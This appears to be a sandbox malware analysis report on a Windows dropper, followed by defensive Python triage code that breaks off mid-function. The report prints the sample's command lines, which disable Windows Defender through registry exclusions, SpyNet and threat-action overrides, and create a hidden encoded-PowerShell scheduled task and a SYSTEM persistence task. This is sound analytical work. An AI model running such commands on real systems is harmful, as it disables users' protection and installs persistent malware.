
Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:776315
MD5:4a0ace7e59a840307eafe3c5975a7638
SHA1:5677a49aa5125af2bf2ce60dc9f304a106b462c1
SHA256:d6c028269bdbe895a6215ed9ba31b1e1fb674d1fb1edb713c133402c0c55fabf
Tags:exe

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • file.exe (PID: 5188 cmdline: C:\Users\user\Desktop\file.exe MD5: 4A0ACE7E59A840307EAFE3C5975A7638)
    • Install.exe (PID: 3376 cmdline: .\Install.exe MD5: ACF9F750C53A4655AF0F2C792DC05166)
      • Install.exe (PID: 2772 cmdline: .\Install.exe /S /site_id "525403" MD5: C58B38377096B7C07958599E0E0C361A)
        • forfiles.exe (PID: 3536 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2532 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 4904 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4136 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 1128 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5008 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 6076 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 5128 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 6052 cmdline: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2692 cmdline: schtasks /run /I /tn "goSRLihgj" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 3216 cmdline: schtasks /DELETE /F /TN "goSRLihgj" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 3004 cmdline: schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 4040 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 5444 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • KZDOWch.exe (PID: 6068 cmdline: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe UB /site_id 525403 /S MD5: C58B38377096B7C07958599E0E0C361A)
    • powershell.exe (PID: 1328 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • gpscript.exe (PID: 4924 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
      • cmd.exe (PID: 1252 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 4852 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 496 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5884 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2904 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2108 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4924 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4188 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4696 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3700 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5136 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6048 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5064 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2220 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4848 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3620 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 572 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5060 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5480 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5584 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5636 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5660 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • cleanup
No configs have been found
No yara matches
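The process tree above shows the installer chaining forfiles.exe, cmd.exe and reg.exe to write Windows Defender policy values (an "exe" entry under Exclusions\Extensions, SpyNetReporting set to 0, and a list of ThreatIDDefaultAction entries set to 6), plus a scheduled task whose action is a base64-encoded PowerShell command. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses tree entries in the "name (PID: n cmdline: ... MD5: ...)" shape, decodes -EncodedCommand arguments (base64 of UTF-16LE text), and translates REG ADD lines under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender into their effect. The embedded entries are copied from the tree; the ThreatIDDefaultAction value table is the documented mapping for that policy, in which 6 means Allow.

```python
"""Added triage helper: parse Joe Sandbox process-tree entries, decode -EncodedCommand
arguments and explain Windows Defender policy changes made through reg.exe."""
import base64
import re

# Constructed input: five entries copied from the process tree above, bullets stripped.
SAMPLE_TREE = r'''
schtasks.exe (PID: 6052 cmdline: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
reg.exe (PID: 4904 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
reg.exe (PID: 6076 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
reg.exe (PID: 496 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
'''

# One tree entry: "<image> (PID: <n> cmdline: <command line> MD5: <hash>)", optionally bulleted.
_ENTRY = re.compile(r'^\s*(?:•\s*)?(?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmdline>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$')
# Whitespace-separated arguments with double-quoted groups; \" inside quotes is allowed.
_ARG = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')
_ENCODED = re.compile(r'-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
# Documented values for the Defender ThreatIDDefaultAction policy.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "User defined", "9": "No action", "10": "Block"}


def split_args(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [(q or bare).replace('\\"', '"') for q, bare in _ARG.findall(cmdline)]


def decode_encoded_command(cmdline):
    """powershell -EncodedCommand carries base64 of the UTF-16LE script text."""
    m = _ENCODED.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def parse_reg_add(cmdline):
    """Return key/name/type/data/view for a 'REG ADD ...' command line, else None."""
    args = split_args(cmdline)
    for i in range(len(args) - 2):
        head = args[i].upper()
        if (head == "REG" or head.endswith("REG.EXE")) and args[i + 1].upper() == "ADD":
            break
    else:
        return None
    entry = {"key": args[i + 2], "name": None, "type": None, "data": None, "view": None}
    fields = {"/v": "name", "/t": "type", "/d": "data"}
    j = i + 3
    while j < len(args):
        flag = args[j].lower()
        if flag in fields and j + 1 < len(args):
            entry[fields[flag]] = args[j + 1]
            j += 2
            continue
        if flag.startswith("/reg:"):
            entry["view"] = flag[5:]  # /reg:64 writes the native view, not Wow6432Node
        j += 1
    return entry


def describe_defender_change(entry):
    """Translate a Defender policy REG ADD into its effect; None for any other key."""
    key = entry["key"]
    if not key.upper().startswith(DEFENDER_POLICY.upper()):
        return None
    sub = key[len(DEFENDER_POLICY):].strip("\\").upper()
    name, data = entry["name"], entry["data"]
    if sub == r"EXCLUSIONS\EXTENSIONS":
        return f"exclude every .{name} file from scanning"
    if sub == "SPYNET" and (name or "").upper() == "SPYNETREPORTING":
        return "MAPS cloud reporting disabled" if data == "0" else f"SpyNetReporting set to {data}"
    if sub == r"THREATS\THREATIDDEFAULTACTION":
        return f"default action for threat ID {name}: {THREAT_ACTIONS.get(data, 'unknown (' + str(data) + ')')}"
    return f"other Defender policy change: {sub} {name}={data}"


def triage(tree_text):
    """One record per tree entry, with decoded PowerShell and the Defender policy effect."""
    records = []
    for line in tree_text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue
        reg = parse_reg_add(m["cmdline"])
        records.append({
            "pid": int(m["pid"]),
            "image": m["image"],
            "decoded_command": decode_encoded_command(m["cmdline"]),
            "defender_change": describe_defender_change(reg) if reg else None,
        })
    return records


if __name__ == "__main__":
    for r in triage(SAMPLE_TREE):
        print(r)
```

Running it decodes the task action to "start-process -WindowStyle Hidden gpupdate.exe /force", which matches the gpupdate.exe child of powershell.exe (PID 5444) in the tree. The paired /reg:32 and /reg:64 writes matter because the installer is 32-bit and runs the SysWOW64 reg.exe, whose default view is Wow6432Node; only the /reg:64 write lands in the native policy key.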

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe, ParentProcessId: 2772, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 6052, ProcessName: schtasks.exe
No Snort rule has matched
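The tree shows two different uses of schtasks.exe. Task "goSRLihgj" is created, started with /run /I and deleted by the same Install.exe, and the powershell.exe it launched (PID 4040) appears at the top of the tree with no parent because the Task Scheduler service started it: a throw-away task used for proxy execution. Task "bbrwVHWbINAVAbZleQ" runs KZDOWch.exe from the user's Temp directory as SYSTEM at 16:12:00 with /V1 and is never deleted: persistence with a privilege jump. The Python below is an added example, not from the report or the sample; it parses schtasks command lines (records constructed from the tree above) and correlates create/run/delete events per task name to separate the two patterns.

```python
"""Added example: correlate schtasks.exe command lines per task name to tell a
throw-away task used for proxy execution from a SYSTEM-level persistence task."""
import re
from collections import defaultdict

# Constructed records: the four schtasks.exe command lines from the process tree above,
# in tree order, each with its parent image.
EVENTS = [
    {"pid": 6052, "parent": "Install.exe", "cmdline": 'schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="'},
    {"pid": 2692, "parent": "Install.exe", "cmdline": 'schtasks /run /I /tn "goSRLihgj"'},
    {"pid": 3216, "parent": "Install.exe", "cmdline": 'schtasks /DELETE /F /TN "goSRLihgj"'},
    {"pid": 3004, "parent": "Install.exe", "cmdline": r'schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F'},
]

_QUOTED = r'"((?:\\.|[^"\\])*)"'  # double-quoted value; \" inside is allowed (schtasks /TR uses it)
_HEAD = re.compile(r'\s*"?(?:[^"\s]*\\)?schtasks(?:\.exe)?"?\s+/(\w+)', re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
ENCODED_PS = re.compile(r"-(?:EncodedCommand|enc|e)\s", re.IGNORECASE)


def _option(cmdline, flag):
    """Value of /FLAG, quoted or bare; None if absent."""
    m = re.search(rf'/{flag}\s+(?:{_QUOTED}|(\S+))', cmdline, re.IGNORECASE)
    if not m:
        return None
    return m.group(1).replace('\\"', '"') if m.group(1) is not None else m.group(2)


def parse_schtasks(cmdline):
    """Operation, task name and the CREATE options that matter for triage; None if not schtasks."""
    m = _HEAD.match(cmdline)
    if not m:
        return None
    return {
        "op": m.group(1).lower(),
        "name": _option(cmdline, "TN"),
        "run_as": _option(cmdline, "RU"),
        "start": _option(cmdline, "ST"),
        "action": _option(cmdline, "TR"),
        "legacy_v1": re.search(r"\s/V1\b", cmdline, re.IGNORECASE) is not None,
    }


def classify_tasks(events):
    """Group events by task name (case-insensitive) and summarise what each task is for."""
    by_task = defaultdict(list)
    for ev in events:
        t = parse_schtasks(ev["cmdline"])
        if t and t["name"]:
            by_task[t["name"].lower()].append((ev, t))
    findings = {}
    for key, items in by_task.items():
        ops = {t["op"] for _, t in items}
        parents = {ev["parent"] for ev, _ in items}
        create = next((t for _, t in items if t["op"] == "create"), None)
        flags = []
        if {"create", "run", "delete"} <= ops and len(parents) == 1:
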